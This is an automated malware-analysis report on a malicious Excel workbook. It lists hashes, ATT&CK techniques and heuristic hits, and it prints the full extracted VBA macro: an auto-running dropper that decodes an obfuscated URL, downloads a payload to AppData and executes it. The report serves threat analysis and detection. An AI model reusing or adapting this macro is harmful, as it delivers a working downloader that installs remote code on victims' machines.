Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 dc065a0837f8c34d…

MALICIOUS

Office (OOXML)

121.3 KB Created: 2020-08-13 13:37:22 UTC Authoring application: Microsoft Excel 14.0300 First seen: 2020-09-07
MD5: 0d0bdf9cd350eaa235ed42355186a0f0 SHA-1: b9df1651881ac0267345b39c9854108c5489a6b8 SHA-256: dc065a0837f8c34db5ca2bad3dafe777be0c22acb15f957b712b2631adf804cc
116 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is an Office document containing VBA macros, specifically a Workbook_Open macro designed to execute automatically. The macro utilizes URLDownloadToFileA to download a second-stage payload from a hardcoded URL, which is then executed using ShellExecuteA. The presence of the 'SE_ENABLE_LURE' heuristic and the document body text further indicate a social engineering attempt to prompt the user to enable content.

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare Function DDBGe Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal lsWjjyCFxVleNvySvzNKt As Long, ByVal GggHPcEXDbtStEyQAWGRW As String, _
ByVal TfwKSTdBvYbHN As String, ByVal hpfKFGEJuBIY As Long, ByVal zzPFH As Long) As Long
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP = Environ$("AppData") & "\" & eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3144 bytes
SHA-256: d8b1cefd861cc3230d2174625c0bde78387b689b52e4d6f690186cd84af88633
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Sib()

End Sub

Attribute VB_Name = "SiloKkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function BIYzzPFHzYBg Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal zYBgeLAULCPbJIwwXgsUoT As Long, ByVal sJVJHBTQnWiokvMNjkuR As String, _
ByVal ycrXexFvbVWUZKE As String, ByVal LpQBRVXPpRwhdQm As String, ByVal cShrZZMzZwJXEVIMmZXRkh As String, ByVal DZyEALOezAKT As Long) As Long

Private Declare Function DDBGe Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal lsWjjyCFxVleNvySvzNKt As Long, ByVal GggHPcEXDbtStEyQAWGRW As String, _
ByVal TfwKSTdBvYbHN As String, ByVal hpfKFGEJuBIY As Long, ByVal zzPFH As Long) As Long

Sub MLoVnY()
Dim BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn As String
Dim eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM As String
Dim CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP As String
Dim cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui As String
Dim QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc As String
Dim DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD As String

eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM = Decrypt("fyf/xxdd")

CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP = Environ$("AppData") & "\" & eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM


BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn = Decrypt("fyf/`efohjT`ltcwvzR0psf{0mq/{jc/eqvujyjnfmjo00;tquui")

DDBGe 0, BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn, CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP, 0, 0
BIYzzPFHzYBg 0, "open", CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP, "", vbNullString, vbNormalFocus
End Sub

Sub Workbook_Open()

MLoVnY
End Sub


Function Decrypt(enc)
    Dim x, m_
    Dim AppData, daor As Variant
    enc = StrReverse(enc)
    For m = 1 To Len(enc)
        x = Mid(enc, m, 1)
        AppData = AppData & Chr(Asc(x) - 1)
    Next
    Decrypt = AppData
    For d = 1 To Len(doar)
    doar = ""
    Next
End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 23552 bytes
SHA-256: 0b61d4c2a0163308b2c8cd25c4edc3861c7b948ad7259494474aa206a84ad394

Open this report in the interactive analyzer, or submit your own file for analysis.